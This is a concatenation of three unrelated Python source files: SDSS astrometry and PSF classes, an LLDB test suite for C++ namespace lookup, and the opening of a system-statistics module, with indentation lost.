class AsTrans(SdssFile):
'''
In DR7, asTrans structures can appear in asTrans files (for a
whole run) or in tsField files (in astrom/ or fastrom/).
http://www.sdss.org/dr7/dm/flatFiles/asTrans.html
In DR8, they are in asTrans files, or in the "frames".
http://data.sdss3.org/datamodel/files/PHOTO_REDUX/RERUN/RUN/astrom/asTrans.html
'''
def __init__(self, *args, **kwargs):
'''
node, incl: in radians
astrans: must be an object with fields:
{a,b,c,d,e,f}[band]
{ricut}[band]
{drow0, drow1, drow2, drow3, dcol0, dcol1, dcol2, dcol3}[band]
{csrow, cscol, ccrow, cccol}[band]
cut_to_band: in DR8 frames files, the astrans elements are not arrays;
in DR7 tsField files they are.
Note about units in this class:
mu,nu are in degrees (great circle coords)
a,d are in degrees (mu0, nu0)
b,c,e,f are in degrees/pixel (dmu,dnu/drow,dcol)
drow0,dcol0 are in pixels (distortion coefficients order 0); dpixels
drow1,dcol1 are unitless dpixels / pixel (distortion coefficients order 1)
drow2,dcol2 are in 1/pixels (dpixels/pixel**2) (distortion coefficients order 2)
drow3,dcol3 are in 1/pixels**2 (dpixels/pixel**3) (distortion coefficients order 3)
csrow,cscol are in pixels/mag (color-dependent shift)
ccrow,cccol are in pixels (non-color-dependent shift)
'''
super(AsTrans, self).__init__(*args, **kwargs)
self.filetype = 'asTrans'
self.node = kwargs.get('node', None)
self.incl = kwargs.get('incl', None)
astrans = kwargs.get('astrans', None)
self.trans = {}
cut = kwargs.get('cut_to_band', True)
if astrans is not None and hasattr(self, 'bandi'):
for f in ['a','b','c','d','e','f', 'ricut',
'drow0', 'drow1', 'drow2', 'drow3',
'dcol0', 'dcol1', 'dcol2', 'dcol3',
'csrow', 'cscol', 'ccrow', 'cccol']:
try:
if hasattr(astrans, f):
el = getattr(astrans, f)
if cut:
el = el[self.bandi]
self.trans[f] = el
except:
print('failed to get astrans.' + f)
import traceback
traceback.print_exc()
pass
self._cache_vals()
@staticmethod
def read(fn, F=None, primhdr=None, table=None):
'''
F: fitsio.FITS object to use an already-open file.
primhdr: FITS header object for the primary HDU.
table: astrometry.util.fits table
'''
if F is None:
import fitsio
F = fitsio.FITS(fn)
if primhdr is None:
primhdr = F[0].read_header()
band = primhdr['FILTER'].strip()
run = primhdr['RUN']
camcol = primhdr['CAMCOL']
field = 0 # 'FRAME' != field
if table is None:
tab = fits_table(F[3].read(lower=True))
else:
tab = table
assert(len(tab) == 1)
tab = tab[0]
return AsTrans(run, camcol, field, band,
node=np.deg2rad(tab.node),
incl=np.deg2rad(tab.incl),
astrans=tab, cut_to_band=False)
def __str__(self):
return (SdssFile.__str__(self) +
' (node=%g, incl=%g)' % (self.node, self.incl))
def _cache_vals(self):
a, b, c, d, e, f = self._get_abcdef()
determinant = b * f - c * e
B = f / determinant
C = -c / determinant
E = -e / determinant
F = b / determinant
py,px, qy,qx = self._get_cscc()
g0, g1, g2, g3 = self._get_drow()
h0, h1, h2, h3 = self._get_dcol()
color0 = self._get_ricut()
self._cached = [self.node, self.incl,
a,b,c,d,e,f, B,C,E,F, px,py,qx,qy, g0,g1,g2,g3,
h0,h1,h2,h3, color0]
def _get_abcdef(self):
return tuple(self.trans[x] for x in 'abcdef')
def _get_drow(self):
return tuple(self.trans[x] for x in ['drow0', 'drow1', 'drow2', 'drow3'])
def _get_dcol(self):
return tuple(self.trans[x] for x in ['dcol0', 'dcol1', 'dcol2', 'dcol3'])
def _get_cscc(self):
return tuple(self.trans[x] for x in ['csrow', 'cscol', 'ccrow', 'cccol'])
def _get_ricut(self):
return self.trans['ricut']
def cd_at_pixel(self, x, y, color=0):
'''
(x,y) to numpy array (2,2) -- the CD matrix at pixel x,y:
[ [ dRA/dx * cos(Dec), dRA/dy * cos(Dec) ],
[ dDec/dx , dDec/dy ] ]
in FITS these are called:
[ [ CD11 , CD12 ],
[ CD21 , CD22 ] ]
Note: these statements have not been verified by the FDA.
'''
ra0,dec0 = self.pixel_to_radec(x, y, color)
step = 10. # pixels
rax,decx = self.pixel_to_radec(x+step, y, color)
ray,decy = self.pixel_to_radec(x, y+step, color)
cosd = np.cos(np.deg2rad(dec0))
return np.array([ [ (rax-ra0)/step * cosd, (ray-ra0)/step * cosd ],
[ (decx-dec0)/step , (decy-dec0)/step ] ])
def pixel_to_radec(self, x, y, color=0):
mu, nu = self.pixel_to_munu(x, y, color)
return self.munu_to_radec(mu, nu)
def radec_to_pixel_single_py(self, ra, dec, color=0):
'''RA,Dec -> x,y for scalar RA,Dec.'''
# RA,Dec -> mu,nu -> prime -> pixel
mu, nu = self.radec_to_munu_single(ra, dec)
return self.munu_to_pixel_single(mu, nu, color)
def radec_to_pixel_single_c(self, ra, dec):
return cutils.radec_to_pixel(float(ra), float(dec), self._cached)
def radec_to_pixel(self, ra, dec, color=0):
mu, nu = self.radec_to_munu(ra, dec)
return self.munu_to_pixel(mu, nu, color)
def munu_to_pixel(self, mu, nu, color=0):
xprime, yprime = self.munu_to_prime(mu, nu, color)
return self.prime_to_pixel(xprime, yprime, color=color)
munu_to_pixel_single = munu_to_pixel
def munu_to_prime(self, mu, nu, color=0):
'''
mu = a + b * rowm + c * colm
nu = d + e * rowm + f * colm
So
[rowm; colm] = [b,c; e,f]^-1 * [mu-a; nu-d]
[b,c; e,f]^1 = [B,C; E,F] in the code below, so
[rowm; colm] = [B,C; E,F] * [mu-a; nu-d]
'''
a, b, c, d, e, f = self._get_abcdef()
determinant = b * f - c * e
B = f / determinant
C = -c / determinant
E = -e / determinant
F = b / determinant
mua = mu - a
# in field 6955, g3, 809 we see a~413
#if mua < -180.:
# mua += 360.
mua += 360. * (mua < -180.)
yprime = B * mua + C * (nu - d)
xprime = E * mua + F * (nu - d)
return xprime,yprime
def pixel_to_munu(self, x, y, color=0):
(xprime, yprime) = self.pixel_to_prime(x, y, color)
a, b, c, d, e, f = self._get_abcdef()
mu = a + b * yprime + c * xprime
nu = d + e * yprime + f * xprime
return (mu, nu)
def pixel_to_prime(self, x, y, color=0):
# Secret decoder ring:
# http://www.sdss.org/dr7/products/general/astrometry.html
# (color)0 is called riCut;
# g0, g1, g2, and g3 are called
# dRow0, dRow1, dRow2, and dRow3, respectively;
# h0, h1, h2, and h3 are called
# dCol0, dCol1, dCol2, and dCol3, respectively;
# px and py are called csRow and csCol, respectively;
# and qx and qy are called ccRow and ccCol, respectively.
color0 = self._get_ricut()
g0, g1, g2, g3 = self._get_drow()
h0, h1, h2, h3 = self._get_dcol()
px, py, qx, qy = self._get_cscc()
# #$(%*&^(%$%*& bad documentation.
(px,py) = (py,px)
(qx,qy) = (qy,qx)
yprime = y + g0 + g1 * x + g2 * x**2 + g3 * x**3
xprime = x + h0 + h1 * x + h2 * x**2 + h3 * x**3
# The code below implements this, vectorized:
# if color < color0:
# xprime += px * color
# yprime += py * color
# else:
# xprime += qx
# yprime += qy
qx = qx * np.ones_like(x)
qy = qy * np.ones_like(y)
xprime += np.where(color < color0, px * color, qx)
yprime += np.where(color < color0, py * color, qy)
return (xprime, yprime)
def prime_to_pixel(self, xprime, yprime, color=0):
color0 = self._get_ricut()
g0, g1, g2, g3 = self._get_drow()
h0, h1, h2, h3 = self._get_dcol()
px, py, qx, qy = self._get_cscc()
# #$(%*&^(%$%*& bad documentation.
(px,py) = (py,px)
(qx,qy) = (qy,qx)
qx = qx * np.ones_like(xprime)
qy = qy * np.ones_like(yprime)
xprime -= np.where(color < color0, px * color, qx)
yprime -= np.where(color < color0, py * color, qy)
# Now invert:
# yprime = y + g0 + g1 * x + g2 * x**2 + g3 * x**3
# xprime = x + h0 + h1 * x + h2 * x**2 + h3 * x**3
x = xprime - h0
# dumb-ass Newton's method
dx = 1.
# FIXME -- should just update the ones that aren't zero
# FIXME -- should put in some failsafe...
while np.max(np.abs(np.atleast_1d(dx))) > 1e-10:
xp = x + h0 + h1 * x + h2 * x**2 + h3 * x**3
dxpdx = 1 + h1 + h2 * 2*x + h3 * 3*x**2
dx = (xprime - xp) / dxpdx
x += dx
y = yprime - (g0 + g1 * x + g2 * x**2 + g3 * x**3)
return (x, y)
def radec_to_munu_single_c(self, ra, dec):
''' Compute ra,dec to mu,nu for a single RA,Dec, calling C code'''
mu,nu = cutils.radec_to_munu(ra, dec, self.node, self.incl)
return mu,nu
def radec_to_munu(self, ra, dec):
'''
RA,Dec in degrees
mu,nu (great circle coords) in degrees
'''
node,incl = self.node, self.incl
assert(ra is not None)
assert(dec is not None)
ra, dec = np.deg2rad(ra), np.deg2rad(dec)
mu = node + np.arctan2(np.sin(ra - node) * np.cos(dec) * np.cos(incl) +
np.sin(dec) * np.sin(incl),
np.cos(ra - node) * np.cos(dec))
nu = np.arcsin(-np.sin(ra - node) * np.cos(dec) * np.sin(incl) +
np.sin(dec) * np.cos(incl))
mu, nu = np.rad2deg(mu), np.rad2deg(nu)
mu += (360. * (mu < 0))
mu -= (360. * (mu > 360))
return (mu, nu)
def munu_to_radec(self, mu, nu):
node,incl = self.node, self.incl
assert(mu is not None)
assert(nu is not None)
# just in case you thought we needed *more* rad/deg conversions...
return munu_to_radec_deg(mu, nu, np.rad2deg(node), np.rad2deg(incl))
if cutils is not None:
AsTrans.radec_to_munu_single = AsTrans.radec_to_munu_single_c
AsTrans.radec_to_pixel_single = AsTrans.radec_to_pixel_single_c
else:
AsTrans.radec_to_munu_single = AsTrans.radec_to_munu
AsTrans.radec_to_pixel_single = AsTrans.radec_to_pixel_single_py
class TsField(SdssFile):
def __init__(self, *args, **kwargs):
super(TsField, self).__init__(*args, **kwargs)
self.filetype = 'tsField'
self.exptime = 53.907456
def setHdus(self, p):
self.hdus = p
self.table = fits_table(self.hdus[1].data)[0]
T = self.table
self.aa = T.aa.astype(float)
self.kk = T.kk.astype(float)
self.airmass = T.airmass
def getAsTrans(self, band):
bandi = band_index(band)
band = band_name(band)
#node,incl = self.getNode(), self.getIncl()
hdr = self.hdus[0].header
node = np.deg2rad(hdr.get('NODE'))
incl = np.deg2rad(hdr.get('INCL'))
asTrans = AsTrans(self.run, self.camcol, self.field, band=band,
node=node, incl=incl, astrans=self.table)
return asTrans
#magL = -(2.5/ln(10))*[asinh((f/f0)/2b)+ln(b)]
# luptitude == arcsinh mag
# band: int
def luptitude_to_counts(self, L, band):
# from arcsinh softening parameters table
# http://www.sdss.org/dr7/algorithms/fluxcal.html#counts2mag
b = [1.4e-10, 0.9e-10, 1.2e-10, 1.8e-10, 7.4e-10]
b = b[band]
maggies = 2.*b * np.sinh(-0.4 * np.log(10.) * L - np.log(b))
dlogcounts = -0.4 * (self.aa[band] + self.kk[band] * self.airmass[band])
return (maggies * self.exptime) * 10.**dlogcounts
def get_zeropoint(self, band):
return (2.5 * np.log10(self.exptime)
-(self.aa[band] + self.kk[band] * self.airmass[band]))
# band: int
def mag_to_counts(self, mag, band):
# log_10(counts)
logcounts = (-0.4 * mag + np.log10(self.exptime)
- 0.4*(self.aa[band] + self.kk[band] * self.airmass[band]))
#logcounts = np.minimum(logcounts, 308.)
#olderrs = np.seterr(all='print')
rtn = 10.**logcounts
#np.seterr(**olderrs)
return rtn
def counts_to_mag(self, counts, band):
# http://www.sdss.org/dr5/algorithms/fluxcal.html#counts2mag
# f/f0 = counts/exptime * 10**0.4*(aa + kk * airmass)
# mag = -2.5 * log10(f/f0)
return -2.5 * (np.log10(counts / self.exptime) +
0.4 * (self.aa[band] + self.kk[band] * self.airmass[band]))
class FpObjc(SdssFile):
def __init__(self, *args, **kwargs):
super(FpObjc, self).__init__(*args, **kwargs)
self.filetype = 'fpObjc'
class FpM(SdssFile):
def __init__(self, *args, **kwargs):
super(FpM, self).__init__(*args, **kwargs)
self.filetype = 'fpM'
self.maskmap = None
def setHdus(self, p):
self.hdus = p
def getMaskPlane(self, name):
# Mask planes are described in HDU 11 (the last HDU)
if self.maskmap is None:
self.maskmap = {}
T = fits_table(self.hdus[-1].data)
T.cut(T.defname == 'S_MASKTYPE')
for k,v in zip(T.attributename, T.value):
k = k.replace('S_MASK_', '')
if k == 'S_NMASK_TYPES':
continue
self.maskmap[k] = v
if not name in self.maskmap:
raise RuntimeError('Unknown mask plane \"%s\"' % name)
data = self.hdus[1 + self.maskmap[name]].data
try:
if data.get_nrows() == 0:
return None
except:
pass
return fits_table(data)
def setMaskedPixels(self, name, img, val, roi=None):
M = self.getMaskPlane(name)
if M is None:
return
if roi is not None:
x0,x1,y0,y1 = roi
for (c0,c1,r0,r1,coff,roff) in zip(M.cmin,M.cmax,M.rmin,M.rmax,
M.col0, M.row0):
assert(coff == 0)
assert(roff == 0)
if roi is not None:
(outx,nil) = get_overlapping_region(c0-x0, c1+1-x0, 0, x1-x0)
(outy,nil) = get_overlapping_region(r0-y0, r1+1-y0, 0, y1-y0)
img[outy,outx] = val
else:
img[r0:r1+1, c0:c1+1] = val
class FpC(SdssFile):
def __init__(self, *args, **kwargs):
super(FpC, self).__init__(*args, **kwargs)
self.filetype = 'fpC'
def getImage(self):
return self.image
def getHeader(self):
return self.header
class PsField(SdssFile):
def __init__(self, *args, **kwargs):
super(PsField, self).__init__(*args, **kwargs)
self.filetype = 'psField'
def setHdus(self, p):
self.hdus = p
t = fits_table(p[6].data)
# the table has only one row...
assert(len(t) == 1)
t = t[0]
#self.table = t
self.gain = t.gain
self.dark_variance = t.dark_variance
self.sky = t.sky
self.skyerr = t.skyerr
self.psp_status = t.status
# Double-Gaussian PSF params
self.dgpsf_s1 = t.psf_sigma1_2g
self.dgpsf_s2 = t.psf_sigma2_2g
self.dgpsf_b = t.psf_b_2g
# summary PSF width (sigmas)
self.psf_fwhm = t.psf_width * (2.*np.sqrt(2.*np.log(2.)))
# 2-gaussian plus power-law PSF params
self.plpsf_s1 = t.psf_sigma1
self.plpsf_s2 = t.psf_sigma2
self.plpsf_b = t.psf_b
self.plpsf_p0 = t.psf_p0
self.plpsf_beta = t.psf_beta
self.plpsf_sigmap = t.psf_sigmap
t = fits_table(p[8].data)
self.per_run_apcorrs = t.ap_corr_run
def getPowerLaw(self, bandnum):
''' Returns:
(a1, sigma_1,
a2, sigma_2,
a3, sigma_power, beta_power)
Where a1 is the amplitude of the first Gaussian and sigma_1 is
its standard deviation; a2 and sigma_2 are the same for the
second Gaussian component, and a3 is the amplitude for the
power-law component. Sigma is the scale length, beta the
power.
RHL claims:
func = a*[exp(-x^2/(2*sigmax1^2) - y^2/(2*sigmay1^2)) +
b*exp(-x^2/(2*sigmax2^2) - y^2/(2*sigmay2^2)) +
p0*(1 + r^2/(beta*sigmap^2))^{-beta/2}]
'''
return (1., self.plpsf_s1[bandnum],
self.plpsf_b[bandnum], self.plpsf_s1[bandnum],
self.plpsf_p0[bandnum], self.plpsf_sigmap[bandnum],
self.plpsf_beta[bandnum])
def getPsfFwhm(self, bandnum):
return self.psf_fwhm[bandnum]
def getDoubleGaussian(self, bandnum, normalize=False):
# http://www.sdss.org/dr7/dm/flatFiles/psField.html
# good = PSP_FIELD_OK
status = self.psp_status[bandnum]
if status != 0:
print('Warning: PsField status[band=%s] =' % (bandnum), status)
# b is the "ratio of G2 to G1 at the origin", ie, not the
# straight Gaussian amplitudes
a = 1.0
s1 = self.dgpsf_s1[bandnum]
s2 = self.dgpsf_s2[bandnum]
b = self.dgpsf_b[bandnum]
# value at center is 1./(2.*pi*sigma**2)
if normalize:
b *= (s2/s1)**2
absum = (a + b)
a /= absum
b /= absum
return (float(a), float(s1), float(b), float(s2))
def getEigenPsfs(self, bandnum):
'''
Returns a numpy array of shape, eg, (4, 51, 51).
'''
T = fits_table(self.hdus[bandnum+1].data)
psfs = []
for psf,h,w in zip(T.rrows, T.rnrow, T.rncol):
psfs.append(psf.reshape((h,w)))
psfs = np.array(psfs)
return psfs
def getEigenPolynomials(self, bandnum):
'''
Returns [ (xorder, yorder, coeffs), (xorder, yorder, coeffs), ...]
one tuple per eigen-PSF.
xorder and yorder are np arrays of integers
coeffs is a numpy array of floating-point coefficients
'''
T = fits_table(self.hdus[bandnum+1].data)
terms = []
for k in range(len(T)):
nrb = T.nrow_b[k]
ncb = T.ncol_b[k]
c = T.c[k]
# !!!
c = c.copy()
c = c.reshape(5, 5)
c = c[:nrb,:ncb]
(gridc,gridr) = np.meshgrid(np.arange(ncb), np.arange(nrb))
# remove the 1e-3 coordinate prescaling
c *= (1e-3 ** (gridr + gridc))
I = np.flatnonzero(c)
terms.append((gridr.flat[I], gridc.flat[I], c.flat[I]))
return terms
def correlateEigenPsf(self, bandnum, img):
from scipy.ndimage.filters import correlate
eigenpsfs = self.getEigenPsfs(bandnum)
eigenterms = self.getEigenPolynomials(bandnum)
H,W = img.shape
corr = np.zeros((H,W))
xx,yy = np.arange(W).astype(float), np.arange(H).astype(float)
for epsf, (XO,YO,C) in zip(eigenpsfs, eigenterms):
k = reduce(np.add, [np.outer(yy**yo, xx**xo) * c
for xo,yo,c in zip(XO,YO,C)])
assert(k.shape == img.shape)
# Trim symmetric zero-padding off the epsf.
# This will fail spectacularly given an all-zero eigen-component.
while True:
H,W = epsf.shape
if (np.all(epsf[:,0] == 0) and np.all(epsf[:,-1] == 0) and
np.all(epsf[0,:] == 0) and np.all(epsf[-1,:] == 0)):
# Trim!
epsf = epsf[1:-1, 1:-1]
else:
break
corr += k * correlate(img, epsf)
return corr
def getPsfAtPoints(self, bandnum, x, y):
'''
Reconstruct the SDSS model PSF from KL basis functions.
x,y can be scalars or 1-d numpy arrays.
Return value:
if x,y are scalars: a PSF image
if x,y are arrays: a list of PSF images
'''
rtnscalar = np.isscalar(x) and np.isscalar(y)
x = np.atleast_1d(x).astype(float)
y = np.atleast_1d(y).astype(float)
eigenpsfs = self.getEigenPsfs(bandnum)
eigenpolys = self.getEigenPolynomials(bandnum)
# From the IDL docs:
# http://photo.astro.princeton.edu/photoop_doc.html#SDSS_PSF_RECON
# acoeff_k = SUM_i{ SUM_j{ (0.001*ROWC)^i * (0.001*COLC)^j * C_k_ij } }
# psfimage = SUM_k{ acoeff_k * RROWS_k }
# we assume all the eigen-psfs are the same size.
assert(len(np.unique([psf.shape for psf in eigenpsfs])) == 1)
xx,yy = np.broadcast_arrays(x, y)
N = len(xx.flat)
psfimgs = np.zeros((N,) + eigenpsfs[0].shape)
for epsf, (XO, YO, C) in zip(eigenpsfs, eigenpolys):
kk = reduce(np.add, [(xx.flat ** xo) * (yy.flat ** yo) * c
for (xo,yo,c) in zip(XO,YO,C)])
psfimgs += epsf[np.newaxis,:,:] * kk[:,np.newaxis,np.newaxis]
if rtnscalar:
return psfimgs[0,:,:]
# convert back to a list...
return [psfimgs[i,:,:] for i in range(N)]
def getGain(self, band=None):
if band is not None:
return self.gain[band]
return self.gain
def getDarkVariance(self, band=None):
if band is not None:
return self.dark_variance[band]
return self.dark_variance
def getSky(self, band=None):
if band is not None:
return self.sky[band]
return self.sky
def getSkyErr(self, band=None):
if band is not None:
return self.skyerr[band]
return self.skyerr
| |
"""
Test the printing of anonymous and named namespace variables.
"""
import lldb
from lldbsuite.test.decorators import *
from lldbsuite.test.lldbtest import *
from lldbsuite.test import lldbutil
class NamespaceLookupTestCase(TestBase):
mydir = TestBase.compute_mydir(__file__)
def setUp(self):
# Call super's setUp().
TestBase.setUp(self)
# Break inside different scopes and evaluate value
self.line_break_global_scope = line_number(
'ns.cpp', '// BP_global_scope')
self.line_break_file_scope = line_number('ns2.cpp', '// BP_file_scope')
self.line_break_ns_scope = line_number('ns2.cpp', '// BP_ns_scope')
self.line_break_nested_ns_scope = line_number(
'ns2.cpp', '// BP_nested_ns_scope')
self.line_break_nested_ns_scope_after_using = line_number(
'ns2.cpp', '// BP_nested_ns_scope_after_using')
self.line_break_before_using_directive = line_number(
'ns3.cpp', '// BP_before_using_directive')
self.line_break_after_using_directive = line_number(
'ns3.cpp', '// BP_after_using_directive')
def runToBkpt(self, command):
self.runCmd(command, RUN_SUCCEEDED)
# The stop reason of the thread should be breakpoint.
self.expect("thread list", STOPPED_DUE_TO_BREAKPOINT,
substrs=['stopped',
'stop reason = breakpoint'])
@expectedFailureAll(
oslist=["freebsd"],
bugnumber="llvm.org/pr25819")
@skipIfWindows # This is flakey on Windows: llvm.org/pr38373
def test_scope_lookup_with_run_command(self):
"""Test scope lookup of functions in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns.cpp",
self.line_break_global_scope,
num_expected_locations=1,
loc_exact=False)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_ns_scope,
num_expected_locations=1,
loc_exact=False)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_nested_ns_scope,
num_expected_locations=1,
loc_exact=False)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_nested_ns_scope_after_using,
num_expected_locations=1,
loc_exact=False)
lldbutil.run_break_set_by_file_and_line(
self,
"ns3.cpp",
self.line_break_before_using_directive,
num_expected_locations=1,
loc_exact=False)
lldbutil.run_break_set_by_file_and_line(
self,
"ns3.cpp",
self.line_break_after_using_directive,
num_expected_locations=1,
loc_exact=False)
# Run to BP_global_scope at global scope
self.runToBkpt("run")
# Evaluate func() - should call ::func()
self.expect("expr -- func()", startstr="(int) $0 = 1")
# Evaluate A::B::func() - should call A::B::func()
self.expect("expr -- A::B::func()", startstr="(int) $1 = 4")
# Evaluate func(10) - should call ::func(int)
self.expect("expr -- func(10)", startstr="(int) $2 = 11")
# Evaluate ::func() - should call A::func()
self.expect("expr -- ::func()", startstr="(int) $3 = 1")
# Evaluate A::foo() - should call A::foo()
self.expect("expr -- A::foo()", startstr="(int) $4 = 42")
# Continue to BP_ns_scope at ns scope
self.runToBkpt("continue")
# Evaluate func(10) - should call A::func(int)
self.expect("expr -- func(10)", startstr="(int) $5 = 13")
# Evaluate B::func() - should call B::func()
self.expect("expr -- B::func()", startstr="(int) $6 = 4")
# Evaluate func() - should call A::func()
self.expect("expr -- func()", startstr="(int) $7 = 3")
# Continue to BP_nested_ns_scope at nested ns scope
self.runToBkpt("continue")
# Evaluate func() - should call A::B::func()
self.expect("expr -- func()", startstr="(int) $8 = 4")
# Evaluate A::func() - should call A::func()
self.expect("expr -- A::func()", startstr="(int) $9 = 3")
# Evaluate func(10) - should call A::func(10)
# NOTE: Under the rules of C++, this test would normally get an error
# because A::B::func() hides A::func(), but lldb intentionally
# disobeys these rules so that the intended overload can be found
# by only removing duplicates if they have the same type.
self.expect("expr -- func(10)", startstr="(int) $10 = 13")
# Continue to BP_nested_ns_scope_after_using at nested ns scope after
# using declaration
self.runToBkpt("continue")
# Evaluate A::func(10) - should call A::func(int)
self.expect("expr -- A::func(10)", startstr="(int) $11 = 13")
# Continue to BP_before_using_directive at global scope before using
# declaration
self.runToBkpt("continue")
# Evaluate ::func() - should call ::func()
self.expect("expr -- ::func()", startstr="(int) $12 = 1")
# Evaluate B::func() - should call B::func()
self.expect("expr -- B::func()", startstr="(int) $13 = 4")
# Continue to BP_after_using_directive at global scope after using
# declaration
self.runToBkpt("continue")
# Evaluate ::func() - should call ::func()
self.expect("expr -- ::func()", startstr="(int) $14 = 1")
# Evaluate B::func() - should call B::func()
self.expect("expr -- B::func()", startstr="(int) $15 = 4")
@expectedFailure("lldb scope lookup of functions bugs")
def test_function_scope_lookup_with_run_command(self):
"""Test scope lookup of functions in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns.cpp",
self.line_break_global_scope,
num_expected_locations=1,
loc_exact=False)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_ns_scope,
num_expected_locations=1,
loc_exact=False)
# Run to BP_global_scope at global scope
self.runToBkpt("run")
# Evaluate foo() - should call ::foo()
# FIXME: lldb finds Y::foo because lookup for variables is done
# before functions.
self.expect("expr -- foo()", startstr="(int) $0 = 42")
# Evaluate ::foo() - should call ::foo()
# FIXME: lldb finds Y::foo because lookup for variables is done
# before functions and :: is ignored.
self.expect("expr -- ::foo()", startstr="(int) $1 = 42")
# Continue to BP_ns_scope at ns scope
self.runToBkpt("continue")
# Evaluate foo() - should call A::foo()
# FIXME: lldb finds Y::foo because lookup for variables is done
# before functions.
self.expect("expr -- foo()", startstr="(int) $2 = 42")
@expectedFailure("lldb file scope lookup bugs")
@skipIfWindows # This is flakey on Windows: llvm.org/pr38373
def test_file_scope_lookup_with_run_command(self):
"""Test file scope lookup in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_file_scope,
num_expected_locations=1,
loc_exact=False)
# Run to BP_file_scope at file scope
self.runToBkpt("run")
# Evaluate func() - should call static ns2.cpp:func()
# FIXME: This test fails because lldb doesn't know about file scopes so
# finds the global ::func().
self.expect("expr -- func()", startstr="(int) $0 = 2")
@skipIfWindows # This is flakey on Windows: llvm.org/pr38373
def test_scope_lookup_before_using_with_run_command(self):
"""Test scope lookup before using in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns3.cpp",
self.line_break_before_using_directive,
num_expected_locations=1,
loc_exact=False)
# Run to BP_before_using_directive at global scope before using
# declaration
self.runToBkpt("run")
# Evaluate func() - should call ::func()
self.expect("expr -- func()", startstr="(int) $0 = 1")
# NOTE: this test may fail on older systems that don't emit import
# entries in DWARF - may need to add checks for compiler versions here.
@skipIf(
compiler="gcc",
oslist=["linux"],
debug_info=["dwo"]) # Skip to avoid crash
@expectedFailureAll(
oslist=["freebsd"],
bugnumber="llvm.org/pr25819")
def test_scope_after_using_directive_lookup_with_run_command(self):
"""Test scope lookup after using directive in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns3.cpp",
self.line_break_after_using_directive,
num_expected_locations=1,
loc_exact=False)
# Run to BP_after_using_directive at global scope after using
# declaration
self.runToBkpt("run")
# Evaluate func2() - should call A::func2()
self.expect("expr -- func2()", startstr="(int) $0 = 3")
@expectedFailure(
"lldb scope lookup after using declaration bugs")
# NOTE: this test may fail on older systems that don't emit import
# emtries in DWARF - may need to add checks for compiler versions here.
def test_scope_after_using_declaration_lookup_with_run_command(self):
"""Test scope lookup after using declaration in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_nested_ns_scope_after_using,
num_expected_locations=1,
loc_exact=False)
# Run to BP_nested_ns_scope_after_using at nested ns scope after using
# declaration
self.runToBkpt("run")
# Evaluate func() - should call A::func()
self.expect("expr -- func()", startstr="(int) $0 = 3")
@expectedFailure("lldb scope lookup ambiguity after using bugs")
def test_scope_ambiguity_after_using_lookup_with_run_command(self):
"""Test scope lookup ambiguity after using in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns3.cpp",
self.line_break_after_using_directive,
num_expected_locations=1,
loc_exact=False)
# Run to BP_after_using_directive at global scope after using
# declaration
self.runToBkpt("run")
# Evaluate func() - should get error: ambiguous
# FIXME: This test fails because lldb removes duplicates if they have
# the same type.
self.expect("expr -- func()", startstr="error")
@expectedFailureAll(
oslist=["freebsd"],
bugnumber="llvm.org/pr25819")
def test_scope_lookup_shadowed_by_using_with_run_command(self):
"""Test scope lookup shadowed by using in lldb."""
self.build()
self.runCmd("file " + self.getBuildArtifact("a.out"), CURRENT_EXECUTABLE_SET)
lldbutil.run_break_set_by_file_and_line(
self,
"ns2.cpp",
self.line_break_nested_ns_scope,
num_expected_locations=1,
loc_exact=False)
# Run to BP_nested_ns_scope at nested ns scope
self.runToBkpt("run")
# Evaluate func(10) - should call A::func(10)
# NOTE: Under the rules of C++, this test would normally get an error
# because A::B::func() shadows A::func(), but lldb intentionally
# disobeys these rules so that the intended overload can be found
# by only removing duplicates if they have the same type.
self.expect("expr -- func(10)", startstr="(int) $0 = 13")
| |
"""
Module to query system stats data.
"""
from __future__ import print_function
import subprocess
import string
import time
import os
import platform
__author__ = "Andrew Gillis"
# Seconds that stats are good before needing to be refreshed.
STATS_TTL = 60
class SystemStats(object):
_last_uptime = 0
_uptime = {}
_load = {}
def __init__(self, show_bytes=False, verbose_du=False):
"""
Arguments:
show_bytes -- If True, show absolute bytes in size values. If False,
only show sizes rounded to the highest significant power
of two.
short_du -- Show shorter disk usage strings.
"""
self._last_disk = 0
self._disk_stats = None
self._last_mem = 0
self._mem_stats = None
self._show_bytes = show_bytes
self._verbose_du = verbose_du
def __str__(self):
"""Get stats information as string."""
st = [self.uptime_str(),
self.disk_usage_str(),
self.cpu_load_str(),
self.memory_usage_str(),
self.logical_cpu_count_str()]
return '\n\n'.join(st)
def stats(self):
return {'disk_usage': self.disk_usage(),
'cpu_load': self.cpu_load(),
'uptime': self.uptime(),
'memory_usage': self.memory_usage(),
'logical_cpu_count': self.logical_cpu_count()}
def uptime_str(self):
"""Return uptime string."""
title = 'Uptime:'
st = [title]
st.append('-'*len(title))
up = self.uptime()
st.append('Up for %s days, %s hours and %s minutes'
% (up['days'], up['hours'], up['minutes']))
return '\n'.join(st)
def disk_usage_str(self):
"""Return disk usage information as string."""
title = 'Disk Usage:'
st = [title]
st.append('-'*len(title))
disks = self.disk_usage()
if self._verbose_du:
for mount in sorted(disks):
disk_info = disks[mount]
st.append('Usage for: %s' % mount)
for datum in ('partition', 'size', 'used', 'available',
'capacity'):
